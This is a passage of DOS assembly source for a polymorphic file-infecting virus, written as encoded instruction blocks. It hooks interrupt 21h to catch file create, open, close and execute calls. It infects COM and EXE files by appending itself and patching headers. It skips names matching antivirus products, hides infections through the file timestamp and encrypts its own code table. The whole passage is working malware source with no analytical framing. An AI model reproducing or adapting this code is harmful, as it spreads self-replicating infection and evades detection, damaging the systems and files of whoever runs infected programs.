jmp_imm32_ db 05h+10h ; Five bytes data db 11101010b ; JMP imm32 (opcode 0eah) dd 00h ; Pointer to virus in top of memory db 11101111b ; End of block ah__ db 11101110b ; Beginning of block dw 0bd9h ; Block identification of ah__ db 01h+10h ; One byte data db 00h ; Accumulator register (high-orde...) db 11101111b ; End of block probability_ db 11101110b ; Beginning of block dw 0bech ; Block identification of probabil... db 02h+10h ; Two bytes data dw 32h ; Probability db 11101111b ; End of block crypt_key_ db 11101110b ; Beginning of block dw 0bd7h ; Block identification of crypt_key_ db 01h+10h ; One data byte db 00h ; 8-bit encryption/decryption key db 11101111b ; End of block sliding_key_ db 11101110b ; Beginning of block dw 0bd8h ; Block identification to sliding_... db 02h+10h ; Two bytes data dw 00h ; 8-bit sliding encryption/decrypt... db 11101111b ; End of block executa_sta db 11101110b ; Beginning of block dw 1388h ; Block identification of executa_sta db 01h+10h ; One byte data db 00h ; Executable status db 11101111b ; End of block origin_code_ db 11101110b ; Beginning of block dw 1f40h ; Block identification of origin_c... db 03h+10h ; Three bytes data db 11000011b,02h dup(00h) db 11101111b ; End of block incorr_code_ db 11101110b ; Beginning of block dw 1776h ; Block identification of incorr_c... db 03h+10h ; Three bytes data db 11000011b,02h dup(00h) db 11101111b ; End of block initial_cs_ db 11101110b ; Beginning of block dw 1389h ; Block identification of initial_cs_ db 02h+10h ; Two bytes data dw 0fff0h ; Initial CS relative to start of ... db 11101111b ; End of block initial_ss_ db 11101110b ; Beginning of block dw 138ah ; Block identification of initial_ss_ db 02h+10h ; Two bytes data dw 0fff0h ; Initial SS relative to start of ... db 11101111b ; End of block initial_ip_ db 11101110b ; Beginning of block dw 138bh ; Block identification of initial_ip_ db 02h+10h ; Two bytes data dw 100h ; Initial IP db 11101111b ; End of block incorrec_ip db 11101110b ; Beginning of block dw 1773h ; Block identification of incorrec_ip db 02h+10h ; Two bytes data dw 100h ; Incorrect IP db 11101111b ; End of block initial_sp_ db 11101110b ; Beginning of block dw 138ch ; Block identification of initial_sp_ db 02h+10h ; Two bytes data dw 0fffeh ; Initial SP db 11101111b ; End of block new_mcb_siz db 11101110b ; Beginning of block dw 1393h ; Block identification of new_mcb_siz db 02h+10h ; Two bytes data dw 1000h ; New size in paragraphs db 11101111b ; End of block mcb_size__ db 11101110b ; Beginning of block dw 1395h ; Block identification of mcb_size__ db 02h+10h ; Two bytes data dw 0ffffh ; Size of memory block in paragraphs db 11101111b ; End of block mcb_size___ db 11101110b ; Beginning of block dw 1394h ; Block identification of mcb_size___ db 02h+10h ; Two bytes data dw 00h ; Size of memory block in paragraphs db 11101111b ; End of block program_seg_ db 11101110b ; Beginning of block dw 0befh ; Block identification of program_... db 02h+10h ; Two bytes data dw 00h ; Segment of PSP for current process db 11101111b ; End of block virus_lengt db 11101110b ; Beginning of block dw 0bf0h ; Block identification of virus_lengt db 02h+10h ; Two bytes data dw 00h ; Length of virus db 11101111b ; End of block vir_exit_of db 11101110b ; Beginning of block dw 0bf1h ; Block identification of vir_exit_of db 02h+10h ; Two bytes data dw 00h ; Offset of virus_exit_ db 11101111b ; End of block tmc_table_ db 11101110b ; Beginning of block dw 4c5h ; Block identification of tmc_table_ db 11101111b ; End of block db 00h ; End of table second_table db 11101111b ; End of block virus_end: crypt_table db 11101110b ; Beginning of block dw 66h ; Block identification of crypt_table db 02h ; Two bytes instruction xor bp,bp ; Zero BP db 02h ; Two bytes instruction mov ds,bp ; DS = segment of BIOS data segment db 04h ; Four bytes instruction mov bx,ds:[46dh] ; BX = timer ticks since midnight db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 03h ; Three bytes instruction and bx,1111111111110000b db 04h ; Four bytes instruction mov ds:[1234h],bx ; Store timer ticks since midnight db 11101101b ; Data reference dw 13adh ; Pointer to timer_ticks db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bfeh ; Pointer to crypt_table_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd4h ; Pointer to get_rnd_num_ db 03h ; Three bytes instruction mov ds:[1234h],al ; Store 8-bit encryption/decryptio... db 11101101b ; Data reference dw 0bd7h ; Pointer to crypt_key_ db 04h ; Four bytes instruction mov ds:[1234h],ah ; Store 8-bit sliding encryption/d... db 11101101b ; Data reference dw 0bd8h ; Pointer to sliding_key_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bfeh ; Pointer to crypt_table_ db 03h ; Three bytes instruction mov ax,3521h ; Get interrupt vector 21h db 02h ; Two bytes instruction int 21h db 03h ; Three bytes instruction mov di,1234h ; DI = offset of int21_addr db 11101101b ; Data reference dw 0c9h ; Pointer to int21_addr db 02h ; Two bytes instruction mov [di],bx ; Store offset of interrupt 21h db 03h ; Three bytes instruction mov [di+02h],es ; Store segment of interrupt 21h db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of int21_virus db 11101101b ; Data reference dw 0c8h ; Pointer to int21_virus db 03h ; Three bytes instruction mov ax,2521h ; Set interrupt vector 21h db 02h ; Two bytes instruction int 21h db 11101001b ; JMP imm16 (opcode 0e9h) dw 65h ; Pointer to virus_exit_ db 11101111b ; End of block crypt_table_ db 11101110b ; Beginning of block dw 0bfeh ; Block identification of crypt_ta... db 03h ; Three bytes instruction mov si,1234h ; SI = offset of tmc_table_ db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 03h ; Three bytes instruction mov cx,(code_end-first_table) db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bffh ; Pointer to crypt_loop db 11101111b ; End of block crypt_loop db 11101110b ; Beginning of block dw 0bffh ; Block identification of crypt_loop db 02h ; Two bytes instruction xor [si],al ; Encrypt byte of table db 01h ; One byte instruction inc si ; Increase offset within table db 02h ; Two bytes instruction add al,ah ; Add 8-bit sliding encryption key... db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to crypt_loop dw 0bffh ; Pointer to crypt_loop db 01h ; One byte instruction ret ; Return db 11101111b ; End of block int21_virus db 11101110b ; Beginning of block dw 0c8h ; Block identification of int21_virus db 01h ; One byte instruction cld ; Clear direction flag db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a0h ; Pointer to push_regs db 03h ; Three bytes instruction cmp ah,3ch ; Create file? db 01110100b+10000000b ; Equal? Jump to exam_drv_let dw 139ah ; Pointer to exam_drv_let db 03h ; Three bytes instruction cmp ah,3dh ; Open file? db 01110100b+10000000b ; Equal? Jump to exam_drv_let dw 139ah ; Pointer to exam_drv_let db 03h ; Three bytes instruction cmp ah,3eh ; Close file? db 01110100b+10000000b ; Equal? Jump to infect_fil dw 139ch ; Pointer to infect_fil db 03h ; Three bytes instruction cmp ah,4bh ; Load and/or execute program? db 01110101b+10000000b ; Not equal? Jump to int21_exit dw 13a6h ; Pointer to int21_exit db 11101001b ; JMP imm16 (opcode 0e9h) dw 13a9h ; Pointer to infect_file db 11101111b ; End of block infect_file db 11101110b ; Beginning of block dw 13a9h ; Block identification of infect_file db 11101000b ; CALL imm16 (opcode 0e8h) dw 1392h ; Pointer to infect_fil_ db 11101001b ; JMP imm16 (opcode 0e9h) dw 13a6h ; Pointer to int21_exit db 11101111b ; End of block int21_exit db 11101110b ; Beginning of block dw 13a6h ; Block identification of int21_exit db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a1h ; Pointer to pop_regs db 05h ; Five bytes instruction jmp dword ptr cs:[1234h] db 11101101b ; Data reference dw 0c9h ; Pointer to int21_addr db 11101111b ; End of block exam_drv_let db 11101110b ; Beginning of block dw 139ah ; Block identification of exam_drv... db 02h ; Two bytes instruction mov si,dx ; SI = offset of filename db 01h ; One byte instruction lodsb ; AL = first byte of filename db 03h ; Three bytes instruction cmp byte ptr [si],':' ; Does filename include drive letter? db 01110101b+10000000b ; Not equal? Jump to exam_def_drv dw 139bh ; Pointer to exam_def_drv db 02h ; Two bytes instruction or al,20h ; Lowercase character db 02h ; Two bytes instruction cmp al,'b' ; Floppy disk? db 01110111b+10000000b ; Above? Jump to int21_exit dw 13a6h ; Pointer to int21_exit db 11101001b ; JMP imm16 (opcode 0e9h) dw 13a8h ; Pointer to infect_file_ db 11101111b ; End of block exam_def_drv db 11101110b ; Beginning of block dw 139bh ; Block identification of exam_def... db 01h ; One byte instruction push ax ; Save AX at stack db 02h ; Two bytes instruction mov ah,19h ; Get current default drive db 02h ; Two bytes instruction int 21h db 02h ; Two bytes instruction cmp al,01h ; Floppy disk? db 01h ; One byte instruction pop ax ; Load AX from stack db 01110111b+10000000b ; Above? Jump to int21_exit dw 13a6h ; Pointer to int21_exit db 11101001b ; JMP imm16 (opcode 0e9h) dw 13a8h ; Pointer to infect_file_ db 11101111b ; End of block infect_file_ db 11101110b ; Beginning of block dw 13a8h ; Block identification of infect_f... db 03h ; Three bytes instruction cmp ah,3ch ; Create file? db 01110101b+10000000b ; Not equal? Jump to infect_file dw 13a9h ; Pointer to infect_file db 02h ; Two bytes instruction xor bx,bx ; Zero file handle db 11101000b ; CALL imm16 (opcode 0e8h) dw 13abh ; Pointer to exam_psp_etc db 01110101b+10000000b ; Not zero? Jump to int21_exit dw 13a6h ; Pointer to int21_exit db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a4h ; Pointer to int24_store db 02h ; Two bytes instruction mov ah,60h ; Canonicalize filename or path db 01h ; One byte instruction dec si ; SI = offset of filename db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop es ; Load ES from stack (CS) db 03h ; Three bytes instruction mov di,1234h ; DI = offset of filename db 11101101b ; Data reference dw 139eh ; Pointer to filename db 02h ; Two bytes instruction int 21h db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a1h ; Pointer to pop_regs db 01h ; One byte instruction pushf ; Save flags at stack db 05h ; Five bytes instruction call dword ptr cs:[1234h] db 11101101b ; Data reference dw 0c9h ; Pointer to int21_addr db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a0h ; Pointer to push_regs db 01h ; One byte instruction pushf ; Save flags at stack db 03h ; Three bytes instruction mov bx,1111111111111111b db 03h ; Three bytes instruction adc bx,00h ; BX = file handle mask db 02h ; Two bytes instruction and ax,bx ; AX = file handle db 04h ; Four bytes instruction mov cs:[1234h],ax ; Store file handle db 11101101b ; Data reference dw 139dh ; Pointer to file_handle db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a5h ; Pointer to int24_load db 01h ; One byte instruction popf ; Load flags from stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a1h ; Pointer to pop_regs db 01h ; One byte instruction sti ; Set interrupt-enable flag db 03h ; Three bytes instruction retf 02h ; Return far and ??? db 11101111b ; End of block infect_fil db 11101110b ; Beginning of block dw 139ch ; Block identification of infect_fil db 11101000b ; CALL imm16 (opcode 0e8h) dw 13abh ; Pointer to exam_psp_etc db 01110010b+10000000b ; Store segment of PSP for current... dw 13a6h ; Pointer to int21_exit db 02h ; Two bytes instruction xor ax,ax ; Zero file handle db 04h ; Four bytes instruction mov cs:[1234h],ax ; Store file handle db 11101101b ; Data reference dw 139dh ; Pointer to file_handle db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a1h ; Pointer to pop_regs db 01h ; One byte instruction pushf ; Save flags at stack db 05h ; Five bytes instruction call dword ptr cs:[1234h] db 11101101b ; Data reference dw 0c9h ; Pointer to int21_addr db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a0h ; Pointer to push_regs db 01h ; One byte instruction pushf ; Save flags at stack db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of filename db 11101101b ; Data reference dw 139eh ; Pointer to filename db 11101000b ; CALL imm16 (opcode 0e8h) dw 1392h ; Pointer to infect_fil_ db 01h ; One byte instruction popf ; Load flags from stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a1h ; Pointer to pop_regs db 01h ; One byte instruction sti ; Set interrupt-enable flag db 03h ; Three bytes instruction retf 02h ; Return far and ??? db 11101111b ; End of block exam_psp_etc db 11101110b ; Beginning of block dw 13abh ; Block identification of exam_psp... db 01h ; One byte instruction push bx ; Save BX at stack db 02h ; Two bytes instruction mov ah,62h ; Get current PSP address db 02h ; Two bytes instruction int 21h db 03h ; Three bytes instruction mov di,1234h ; DI = offset of progra_seg db 11101101b ; Data reference dw 139fh ; Pointer to progra_seg db 03h ; Three bytes instruction cmp cs:[di],bx ; Segment of PSP for current proc...? db 03h ; Three bytes instruction mov cs:[di],bx ; Store segment of PSP for current... db 03h ; Three bytes instruction mov di,1234h ; DI = offset of file_handle db 11101101b ; Data reference dw 139dh ; Pointer to file_handle db 01110101b+10000000b ; Not equal? Jump to dont_infect dw 13ach ; Pointer to dont_infect db 01h ; One byte instruction pop bx ; Load BX from stack db 02h ; Two bytes instruction mov ax,bx ; AX = file handle db 03h ; Three bytes instruction sub ax,cs:[di] ; Subtract saved file handle from ... db 03h ; Three bytes instruction add ax,0ffffh ; Add sixty-five thousand five hun... db 01h ; One byte instruction inc ax ; Increase file handle db 01h ; One byte instruction ret ; Return db 11101111b ; End of block dont_infect db 11101110b ; Beginning of block dw 13ach ; Block identification of dont_infect db 05h ; Five bytes instruction mov word ptr cs:[di],00h db 02h ; Two bytes instruction xor ax,ax ; Zero file handle db 01h ; One byte instruction pop bx ; Load BX from stack db 01h ; One byte instruction stc ; Set carry flag db 01h ; One byte instruction ret ; Return db 11101111b ; End of block infect_fil_ db 11101110b ; Beginning of block dw 1392h ; Block identification of infect_fil_ db 01h ; One byte instruction push ds ; Save DS at stack db 01h ; One byte instruction pop es ; Load ES from stack (DS) db 02h ; Two bytes instruction mov di,dx ; DI = offset of filename db 03h ; Three bytes instruction mov cx,43h ; CX = number of bytes to search t... db 02h ; Two bytes instruction xor al,al ; Zero AL db 02h ; Two bytes instruction repne scasb ; Find end of filename db 01110101b+10000000b ; Not equal? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction lea si,[di-05h] ; SI = offset of the dot in the fi... db 01h ; One byte instruction lodsw ; AX = two bytes of filename db 03h ; Three bytes instruction or ax,2020h ; Lowercase characters db 03h ; Three bytes instruction mov bx,'mo' ; COM executable db 03h ; Three bytes instruction cmp ax,'c.' ; COM executable? db 01110100b+10000000b ; Equal? Jump to examine_ext dw 0f0h ; Pointer to examine_ext db 03h ; Three bytes instruction mov bx,'ex' ; EXE executable db 03h ; Three bytes instruction cmp ax,'e.' ; EXE executable? db 01110100b+10000000b ; Equal? Jump to examine_ext dw 0f0h ; Pointer to examine_ext db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fbh ; Pointer to infect_exit_ db 11101111b ; End of block examine_ext db 11101110b ; Beginning of block dw 0f0h ; Block identification of examine_ext db 01h ; One byte instruction lodsw ; AX = two bytes of filename db 03h ; Three bytes instruction or ax,2020h ; Lowercase characters db 02h ; Two bytes instruction cmp ax,bx ; COM or EXE executable? db 01110101b+10000000b ; Not equal? Jump to examine_ext dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction sub si,04h ; SI = offset of the dot in the fi... db 11101001b ; JMP imm16 (opcode 0e9h) dw 1398h ; Pointer to find_name db 11101111b ; End of block find_name db 11101110b ; Beginning of block dw 1398h ; Block identification of find_name db 01h ; One byte instruction dec si ; SI = offset within filename db 02h ; Two bytes instruction mov al,[si] ; AL = byte of filename db 02h ; Two bytes instruction cmp al,'/' ; Beginning of filename? db 01110100b+10000000b ; Equal? Jump to examine_name dw 1397h ; Pointer to examine_name db 02h ; Two bytes instruction cmp al,'\' ; Beginning of filename? db 01110100b+10000000b ; Equal? Jump to examine_name dw 1397h ; Pointer to examine_name db 02h ; Two bytes instruction cmp al,':' ; Beginning of filename? db 01110100b+10000000b ; Equal? Jump to examine_name dw 1397h ; Pointer to examine_name db 02h ; Two bytes instruction cmp si,dx ; Beginning of filename? db 01110111b+10000000b ; Above? Jump to find_name dw 1398h ; Pointer to find_name db 01h ; One byte instruction dec si ; SI = offset within filename db 11101001b ; JMP imm16 (opcode 0e9h) dw 1397h ; Pointer to examine_name db 11101111b ; End of block examine_name db 11101110b ; Beginning of block dw 1397h ; Block identification of examine_... db 01h ; One byte instruction inc si ; SI = offset of beginning of file... db 01h ; One byte instruction lodsw ; AX = two bytes of filename db 03h ; Three bytes instruction or ax,2020h ; Lowercase characters db 03h ; Three bytes instruction xor ax,0aa55h ; Encrypt two bytes of filename db 03h ; Three bytes instruction cmp ax,('ci' xor 0aa55h) db 01110100b+10000000b ; Equal? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('on' xor 0aa55h) db 01110100b+10000000b ; NOD-iCE? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('ew' xor 0aa55h) db 01110100b+10000000b ; Dr. Web? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('bt' xor 0aa55h) db 01110100b+10000000b ; ThunderByte Anti-Virus? Jump to ... dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('va' xor 0aa55h) db 01110100b+10000000b ; AntiViral Toolkit Pro? Jump to i... dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('-f' xor 0aa55h) db 01110100b+10000000b ; F-PROT? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('cs' xor 0aa55h) db 01110100b+10000000b ; McAfee ViruScan? Jump to infect_... dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('lc' xor 0aa55h) db 01110100b+10000000b ; McAfee ViruScan? Jump to infect_... dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('oc' xor 0aa55h) db 01110100b+10000000b ; COMMAND.COM? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('iw' xor 0aa55h) db 01110100b+10000000b ; WIN.COM? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('rk' xor 0aa55h) db 01110100b+10000000b ; Equal? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a4h ; Pointer to int24_store db 03h ; Three bytes instruction mov ax,3d02h ; Open file (read/write) db 01h ; One byte instruction pushf ; Save flags at stack db 05h ; Five bytes instruction call dword ptr cs:[1234h] db 11101101b ; Data reference dw 0c9h ; Pointer to int21_addr db 01110010b+10000000b ; Error? Jump to terminate_ dw 1771h ; Pointer to infect_exit db 02h ; Two bytes instruction mov bx,ax ; BX = file handle db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 02h ; Two bytes instruction mov ds,ax ; DS = segment of BIOS data segment db 04h ; Four bytes instruction mov si,ds:[46dh] ; SI = timer ticks since midnight db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 01h ; One byte instruction pop es ; Load ES from stack (CS) db 03h ; Three bytes instruction mov ax,5700h ; Get file's date and time db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 04h ; Four bytes instruction mov ds:[1234h],dx ; Store file's date db 11101101b ; Data reference dw 12dh ; Pointer to file_date db 02h ; Two bytes instruction mov al,cl ; AL = low-order byte of file time db 02h ; Two bytes instruction and al,00011111b ; AL = file seconds db 02h ; Two bytes instruction cmp al,00000100b ; Already infected (8 seconds)? db 01110100b+10000000b ; Equal? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction and cl,11100000b ; Zero file seconds db 03h ; Three bytes instruction or cl,00000100b ; Set infection mark (8 seconds) db 04h ; Four bytes instruction mov ds:[1234h],cx ; Store file's time db 11101101b ; Data reference dw 12ch ; Pointer to file_time db 03h ; Three bytes instruction and si,1111111111110000b db 04h ; Four bytes instruction cmp ds:[1234h],si ; Infect file? db 11101101b ; Data reference dw 13adh ; Pointer to timer_ticks db 01110100b+10000000b ; Equal? Jump to close_file dw 0fah ; Pointer to close_file db 04h ; Four bytes instruction mov ds:[1234h],si ; Store timer ticks since midnight db 11101101b ; Data reference dw 13adh ; Pointer to timer_ticks db 02h ; Two bytes instruction mov ah,3fh ; Read from file db 03h ; Three bytes instruction mov cx,18h ; Read twenty-four bytes db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of exe_header db 11101101b ; Data reference dw 138fh ; Pointer to exe_header db 02h ; Two bytes instruction mov si,dx ; SI = offset of exe_header db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction mov ax,4202h ; Set current file position (EOF) db 01h ; One byte instruction cwd ; DX = high-order word of offset f... db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction int 21h db 06h ; Six bytes instruction mov ds:[00h],0010111010001101b db 04h ; Four bytes instruction cmp [si],'ZM' ; EXE signature? db 01110100b+10000000b ; Equal? Jump to infect_exe dw 138dh ; Pointer to infect_exe db 04h ; Four bytes instruction cmp [si],'MZ' ; EXE signature? db 01110100b+10000000b ; Equal? Jump to infect_exe dw 138dh ; Pointer to infect_exe db 04h ; Four bytes instruction mov ds:[1234h],cl ; Store executable status db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 03h ; Three bytes instruction cmp ax,0bb8h ; Too small in filesize? db 01110010b+10000000b ; Below? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction cmp ax,0dea8h ; Too large in filesize? db 01110111b+10000000b ; Above? Jump to close_file dw 0fah ; Pointer to close_file db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov di,1234h ; DI = offset of exe_header db 11101101b ; Data reference dw 138fh ; Pointer to exe_header db 02h ; Two bytes instruction mov cl,[di] ; CL = first byte of original code... db 03h ; Three bytes instruction mov byte ptr [di],11101001b db 01h ; One byte instruction inc di ; DI = offset within exe_header db 04h ; Four bytes instruction mov ds:[1234h],cl ; Store first byte of original cod... db 11101101b ; Data reference dw 1f40h ; Pointer to origin_code_ db 04h ; Four bytes instruction mov ds:[1234h],cl ; Store first byte of original cod... db 11101101b ; Data reference dw 1776h ; Pointer to incorr_code_ db 02h ; Two bytes instruction mov cx,[di] ; CX = word of original code of in... db 03h ; Three bytes instruction mov si,1234h ; SI = offset of origin_code_ db 11101101b ; Data reference dw 1f40h ; Pointer to origin_code_ db 03h ; Three bytes instruction mov [si+01h],cx ; Store word of original code of i... db 03h ; Three bytes instruction sub ax,03h ; AX = offset of virus within infe... db 01h ; One byte instruction stosw ; Store offset of virus within inf... db 03h ; Three bytes instruction mov ax,14h ; AX = probability of storing inco... db 04h ; Four bytes instruction cmp ds:[1234h],ax ; Store incorrect IP? db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 01110111b+10000000b ; Above? Jump to write_virus dw 13afh ; Pointer to dont_corrupt db 03h ; Three bytes instruction mov bp,10h ; Random number within sixteen db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 03h ; Three bytes instruction sub ax,08h ; Subtract eight from random number db 02h ; Two bytes instruction add cx,ax ; Add random number to word of ori... db 11101001b ; JMP imm16 (opcode 0e9h) dw 13afh ; Pointer to dont_corrupt db 11101111b ; End of block dont_corrupt db 11101110b ; Beginning of block dw 13afh ; Block identification of dont_cor... db 03h ; Three bytes instruction mov si,1234h ; SI = offset of incorr_code_ db 11101101b ; Data reference dw 1776h ; Pointer to incorr_code_ db 03h ; Three bytes instruction mov [si+01h],cx ; Store word of original code of i... db 01h ; One byte instruction pop si ; Load SI from stack db 03h ; Three bytes instruction mov ax,0fff0h ; AX = initial CS and SS relative ... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial CS relative to sta... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial SS relative to sta... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction mov ax,100h ; AX = initial IP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial IP db 11101101b ; Data reference dw 138bh ; Pointer to initial IP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial IP db 11101101b ; Data reference dw 1773h ; Pointer to incorrec_ip db 03h ; Three bytes instruction mov ax,0fffeh ; AX = initial SP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial SP db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 01h ; One byte instruction inc ax ; Increase size of memory block in... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store size of memory block in pa... db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 03h ; Three bytes instruction mov ax,1000h ; AX = new size in paragraphs db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store new size in paragraphs db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 03h ; Three bytes instruction mov ax,4202h ; Set current file position (EOF) db 01h ; One byte instruction cwd ; DX = low-order word of offset f... db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction int 21h db 03h ; Three bytes instruction add ax,100h ; AX = delta offset db 11101001b ; JMP imm16 (opcode 0e9h) dw 138eh ; Pointer to write_virus db 11101111b ; End of block write_virus db 11101110b ; Beginning of block dw 138eh ; Block identification of write_virus db 03h ; Three bytes instruction mov ds:[02h],ax ; Store delta offset db 02h ; Two bytes instruction mov ah,40h ; Write to file db 01h ; Two bytes instruction cwd ; Zero DX db 03h ; Three bytes instruction mov cx,1234h ; CX = length of virus db 11101101b ; Data reference dw 66h ; Pointer to virus_end db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction mov ax,4200h ; Set current file position (SOF) db 01h ; One byte instruction cwd ; DX = low-order word of offset f... db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction int 21h db 02h ; Two bytes instruction mov ah,40h ; Write to file db 02h ; Two bytes instruction mov dx,si ; DX = offset of exe_header db 03h ; Three bytes instruction mov cx,18h ; Write twenty-four bytes db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction mov ax,5701h ; Set file's date and time db 04h ; Four bytes instruction mov cx,ds:[1234h] ; CX = new time db 11101101b ; Data reference dw 12ch ; Pointer to file_time db 04h ; Four bytes instruction mov dx,ds:[1234h] ; DX = new date db 11101101b ; Data reference dw 12dh ; Pointer to file_date db 02h ; Two bytes instruction int 21h db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fah ; Pointer to close_file db 11101111b ; End of block close_file db 11101110b ; Beginning of block dw 0fah ; Block identification of close_file db 02h ; Two bytes instruction mov ah,3eh ; Close file db 02h ; Two bytes instruction int 21h db 11101001b ; JMP imm16 (opcode 0e9h) dw 1771h ; Pointer to infect_exit db 11101111b ; End of block infect_exit db 11101110b ; Beginning of block dw 1771h ; Block identification of infect_exit db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a5h ; Pointer to int24_load db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fbh ; Pointer to infect_exit_ db 11101111b ; End of block infect_exit_ db 11101110b ; Beginning of block dw 0fbh ; Block identification of infect_e... db 01h ; One byte instruction ret ; Return db 11101111b ; End of block infect_exe db 11101110b ; Beginning of block dw 138dh ; Block identification of infect_exe db 01h ; One byte instruction inc cx ; EXE executable db 04h ; Four bytes instruction mov ds:[1234h],cl ; Store executable status db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 02h ; Two bytes instruction or dx,dx ; Too small in filesize? db 01110101b+10000000b ; Not zero? Jump to exam_filesiz dw 13aeh ; Pointer to exam_filesiz db 03h ; Three bytes instruction cmp ax,2710h ; Too small in filesize? db 01110010b+10000000b ; Below? Jump to close_file dw 0fah ; Pointer to close_file db 11101001b ; JMP imm16 (opcode 0e9h) dw 13aeh ; Pointer to exam_filesiz db 11101111b ; End of block exam_filesiz db 11101110b ; Beginning of block dw 13aeh ; Block identification of exam_fil... db 03h ; Three bytes instruction cmp dx,06h ; Too large in filesize? db 01110111b+10000000b ; Above? Jump to close_file dw 0fah ; Pointer to close_file db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 03h ; Three bytes instruction mov cx,200h ; Divide by pages db 02h ; Two bytes instruction div cx ; DX:AX = filesize in pages db 01h ; One byte instruction inc ax ; Increase total number of 512-byt... db 03h ; Three bytes instruction cmp [si+04h],ax ; Internal overlay? db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 01110101b+10000000b ; Not equal? Jump to close_file dw 0fah ; Pointer to close_file db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 04h ; Four bytes instruction cmp [si+0ch],0ffffh ; Maximum paragraphs to allocate ...? db 01110100b+10000000b ; Equal? Jump to maximum_mem dw 1399h ; Pointer to maximum_mem db 03h ; Three bytes instruction mov ax,[si+04h] ; AX = total number of 512-byte pa... db 01h ; One byte instruction inc ax ; Increase total number of 512-byt... db 02h ; Two bytes instruction mov cl,05h ; Divide by thirty-two db 02h ; Two bytes instruction shl ax,cl ; AX = total number of 512-byte pa... db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... db 11101001b 